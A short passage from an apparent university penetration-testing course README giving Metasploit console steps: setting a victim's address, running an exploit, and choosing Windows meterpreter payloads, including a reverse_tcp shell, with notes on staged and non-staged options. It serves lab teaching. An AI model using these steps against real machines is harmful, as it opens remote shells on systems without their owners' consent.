Jay-Idrees/UPenn-CyberSecurity-Penetration-Testing/README.md

 - `set rhosts <ip address of victim>`
 - `show targets`
 - `run`

+- Once you are able to connect.
+The next step is sending the malware script

 - `set payload windows/x64/meterpreter` see if the options for the staged show up.
 The goal is to just try an alternative with staged approach if the non-staged approach does not work
 - `set payload windows/x64/meterpreter/reverse_tcp` - Note that this is at the exploit level and before you have established the connection